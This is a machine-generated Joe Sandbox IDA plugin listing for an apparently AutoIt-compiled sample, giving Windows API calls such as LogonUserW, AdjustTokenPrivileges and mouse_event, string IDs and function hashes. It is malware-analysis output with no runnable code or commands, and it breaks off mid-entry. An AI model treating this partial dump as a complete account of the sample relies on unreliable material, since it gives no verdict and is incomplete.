                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID: 0ej
                                                      • API String ID: 2893107130-1858546470
                                                      • Opcode ID: bf5dc43b72f968181551cc076c0e028bacc6d09bb9aa7b59c79718f0e33939b6
                                                      • Instruction ID: 8f46992c36c225285bfff1f489cbed5ec2a8e816339ebbd45191eaf7c148f2a7
                                                      • Opcode Fuzzy Hash: bf5dc43b72f968181551cc076c0e028bacc6d09bb9aa7b59c79718f0e33939b6
                                                      • Instruction Fuzzy Hash: A821A232A256108FC729CF25D851A52B3E2EFA5311B689E6CE1F5CB2C0CA34B905CF54
                                                      APIs
                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00644CB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID: DOWN
                                                      • API String ID: 2434400541-711622031
                                                      • Opcode ID: dc3bb7e0af6a04d3ad649f8abd5b21d4748b009f13f479c998adea8df9a402eb
                                                      • Instruction ID: 1d7bd8fc02ac0f98d524174b09a8720d4801f04445ddb2f3188d0e872ed65d93
                                                      • Opcode Fuzzy Hash: dc3bb7e0af6a04d3ad649f8abd5b21d4748b009f13f479c998adea8df9a402eb
                                                      • Instruction Fuzzy Hash: 64E046621DD72238EA882A28FC07FF7028E8F22339B15020AF814E55C1ED812C8224A9
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0064C6FB
                                                      • FindClose.KERNEL32(00000000), ref: 0064C72B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 7a0bfa4cee3a1388aec34246c0800c234c6b7ded9175e833e25a57e9fae7d7ce
                                                      • Instruction ID: 3176d27fa55d296d32cf775addba5b62ee26bc96535a087b6deef47e0fabdaa2
                                                      • Opcode Fuzzy Hash: 7a0bfa4cee3a1388aec34246c0800c234c6b7ded9175e833e25a57e9fae7d7ce
                                                      • Instruction Fuzzy Hash: A3118E726042009FDB10DF29D859A6AFBE9FF85324F00851EF8A9973A0DB70AC01CF81
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00659468,?,0066FB84,?), ref: 0064A097
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00659468,?,0066FB84,?), ref: 0064A0A9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: beeac11a93bb10c7eb347b70ffc115f235ef824ac037849eb547754f8e1f7d8a
                                                      • Instruction ID: 31fa89cb639a31a76efb658c4a87810b356af65d4b9a8673ecdc15260c72b51b
                                                      • Opcode Fuzzy Hash: beeac11a93bb10c7eb347b70ffc115f235ef824ac037849eb547754f8e1f7d8a
                                                      • Instruction Fuzzy Hash: CEF0E23514422DBBDB209FA4DC48FEA776EFF08761F004265F918D6280C6709A40CBA1
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00638309), ref: 006381E0
                                                      • CloseHandle.KERNEL32(?,?,00638309), ref: 006381F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: b78a17e0914fff5ac5e819023a455fd58d7989fa791fcc7ea352a949dd11615e
                                                      • Instruction ID: 6781a6e6202829ee6f77a9e8941030109c0b3a7cc526303681bed583249b36b2
                                                      • Opcode Fuzzy Hash: b78a17e0914fff5ac5e819023a455fd58d7989fa791fcc7ea352a949dd11615e
                                                      • Instruction Fuzzy Hash: 24E0EC72014612AFF7652B60FC09EB77BEBEF04350B24982DF8A694470DB62AC91DB54
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00608D57,?,?,?,00000001), ref: 0060A15A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0060A163
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 7809065260f12fe39c0d22695d6f1a3330981357af46727e752add745c90b2c3
                                                      • Instruction ID: 614537f248353c5397ca64f1fdb805928e7e42e3fd90b44e85c7001f5341497e
                                                      • Opcode Fuzzy Hash: 7809065260f12fe39c0d22695d6f1a3330981357af46727e752add745c90b2c3
                                                      • Instruction Fuzzy Hash: 37B09231058208ABCB002B91FC09B883F6AEB44AA2F405020F60D94260EFA254508AD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9cfad90528810dc710f64d3cc68300fcce36e1356945ee27c67e4c5c32da3bea
                                                      • Instruction ID: 6898c06c1ec6c9dc251feea797ad3cbe88680a59272c5e635b4a7762dcc66dc4
                                                      • Opcode Fuzzy Hash: 9cfad90528810dc710f64d3cc68300fcce36e1356945ee27c67e4c5c32da3bea
                                                      • Instruction Fuzzy Hash: D032E221D69F014DD72B9A34D832336A24AAFB77D4F15D737E81AB5EA6EB29C4C34100
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d2adf9a8b33a589363abe0807fd4d7f3f90065d79cec395f4a00f82e251b404
                                                      • Instruction ID: 666ffced651be4f025777f13b75279c3acc935305959a4019f5574d46fc5b469
                                                      • Opcode Fuzzy Hash: 8d2adf9a8b33a589363abe0807fd4d7f3f90065d79cec395f4a00f82e251b404
                                                      • Instruction Fuzzy Hash: 78B1DD30D2AF414DD3239A39883533AB69DAFBB2D5B51E71BFC1A74D22EB2285C34141
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00638389), ref: 006387D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 8552d97ce417df6ea4694cb33d192ada27ee6ed88495017a8bb434ac11dd0b9a
                                                      • Instruction ID: 8c3964ad2c4bedc30e820f0694d34c6d0ffd298ea9e6fb2bb3fc134b836566fc
                                                      • Opcode Fuzzy Hash: 8552d97ce417df6ea4694cb33d192ada27ee6ed88495017a8bb434ac11dd0b9a
                                                      • Instruction Fuzzy Hash: 17D09E3226450EBBEF019FA4ED05EAE3B6AEB04B01F408511FE15D51A1C7B5D935AB60
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0060A12A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 150489708849ef45a5a68cce93cc1f847bf2508a4dce600d9384df97941d3a8a
                                                      • Instruction ID: ac08cb9b52718142e1a8be7f8c9e976dbcc1506b2ea3a4b64ea824995e95959e
                                                      • Opcode Fuzzy Hash: 150489708849ef45a5a68cce93cc1f847bf2508a4dce600d9384df97941d3a8a
                                                      • Instruction Fuzzy Hash: EAA0223000020CFBCF002F82FC08888BFAEEB002E0B008030F80C80232EFB3A8208AC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62ba869e7f12822d76771133c6c34cbaf1ab1291ca8d860fe45936c3af31dcb6
                                                      • Instruction ID: 18fc39a06ac2a7a25853684a81259a635bbcde109735d52bdbc831da07f5d888
                                                      • Opcode Fuzzy Hash: 62ba869e7f12822d76771133c6c34cbaf1ab1291ca8d860fe45936c3af31dcb6
                                                      • Instruction Fuzzy Hash: 9A22053060451ACBDF288B24C4D47BDBBA3FF41354F28846BDA978B692DB789D91C781
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: f37c34ea12aeae771452606bd4bd97a80d29c81301671afae1a5499159db022f
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 75C162322451930ADF2D4639C4781BFBBA25EA37B135A176DD8B3CF2D4EE20C965D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 89cf8ad4a408c6f3d0c590f9cca5a5c88f7df5918cf3cbd7fe49302aa31d41ec
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 0EC197322451930ADF2D463AC43817FFBA25EA37B135A176DD4B2DF2D4EE10C929E620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 1981555a567ae86af052c4df44bfb64d4ed07b3a882a35f5b50fb674d7739b1a
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 30C170322851930ADF2D463AC4741BFBBA25EA37B135A176DD4B3CF2C4EE20C925D620
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 0065785B
                                                      • DeleteObject.GDI32(00000000), ref: 0065786D
                                                      • DestroyWindow.USER32 ref: 0065787B
                                                      • GetDesktopWindow.USER32 ref: 00657895
                                                      • GetWindowRect.USER32(00000000), ref: 0065789C
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006579DD
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006579ED
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657A35
                                                      • GetClientRect.USER32(00000000,?), ref: 00657A41
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00657A7B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657A9D
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AB0
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657ABB
                                                      • GlobalLock.KERNEL32(00000000), ref: 00657AC4
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AD3
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00657ADC
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AE3
                                                      • GlobalFree.KERNEL32(00000000), ref: 00657AEE
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657B00
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00672CAC,00000000), ref: 00657B16
                                                      • GlobalFree.KERNEL32(00000000), ref: 00657B26
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00657B4C
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00657B6B
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657B8D
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657D7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-3613752883
                                                      • Opcode ID: fa2a028760e3968c8fd81d06542bd07c8b8d9fb3a6ca967d7db119c6ec56d44c
                                                      • Instruction ID: 7d6500bb66b4cd4da786fd93b843268d9c073fe21bc559abf5acd48a6a35f39d
                                                      • Opcode Fuzzy Hash: fa2a028760e3968c8fd81d06542bd07c8b8d9fb3a6ca967d7db119c6ec56d44c
                                                      • Instruction Fuzzy Hash: 4E024B71900115EFDB14DFA4EC89EAE7BBAFF49311F148168F915AB2A1CB70AD05CB60
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0066A630
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0066A661
                                                      • GetSysColor.USER32(0000000F), ref: 0066A66D
                                                      • SetBkColor.GDI32(?,000000FF), ref: 0066A687
                                                      • SelectObject.GDI32(?,00000000), ref: 0066A696
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0066A6C1
                                                      • GetSysColor.USER32(00000010), ref: 0066A6C9
                                                      • CreateSolidBrush.GDI32(00000000), ref: 0066A6D0
                                                      • FrameRect.USER32(?,?,00000000), ref: 0066A6DF
                                                      • DeleteObject.GDI32(00000000), ref: 0066A6E6
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0066A731
                                                      • FillRect.USER32(?,?,00000000), ref: 0066A763
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0066A78E
                                                        • Part of subcall function 0066A8CA: GetSysColor.USER32(00000012), ref: 0066A903
                                                        • Part of subcall function 0066A8CA: SetTextColor.GDI32(?,?), ref: 0066A907
                                                        • Part of subcall function 0066A8CA: GetSysColorBrush.USER32(0000000F), ref: 0066A91D
                                                        • Part of subcall function 0066A8CA: GetSysColor.USER32(0000000F), ref: 0066A928
                                                        • Part of subcall function 0066A8CA: GetSysColor.USER32(00000011), ref: 0066A945
                                                        • Part of subcall function 0066A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066A953
                                                        • Part of subcall function 0066A8CA: SelectObject.GDI32(?,00000000), ref: 0066A964
                                                        • Part of subcall function 0066A8CA: SetBkColor.GDI32(?,00000000), ref: 0066A96D
                                                        • Part of subcall function 0066A8CA: SelectObject.GDI32(?,?), ref: 0066A97A
                                                        • Part of subcall function 0066A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0066A999
                                                        • Part of subcall function 0066A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066A9B0
                                                        • Part of subcall function 0066A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0066A9C5
                                                        • Part of subcall function 0066A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066A9ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID: @U=u
                                                      • API String ID: 3521893082-2594219639
                                                      • Opcode ID: 627446926c0a750acdef827291196331846611843fcbe973cdb1f8606d93dca0
                                                      • Instruction ID: 043dd59e553dc6d70c78724ad767ca651d53e246076d4598626a50b8b0aeb55c
                                                      • Opcode Fuzzy Hash: 627446926c0a750acdef827291196331846611843fcbe973cdb1f8606d93dca0
                                                      • Instruction Fuzzy Hash: 07916072008301FFD7109FA4EC08A5BBBAAFF49321F145B29F562A61A1D771D945CF52
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,0066F910), ref: 00663627
                                                      • IsWindowVisible.USER32(?), ref: 0066364B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-3469695742
                                                      • Opcode ID: ddebfd9c503d7a5d91bbb8adc61dbf71d03073aca49f2875d8bb2371e6ed2dd5
                                                      • Instruction ID: 02d255307544b49331e6fc5f702acf0f6d515290376d8bb59e67c402acc19665
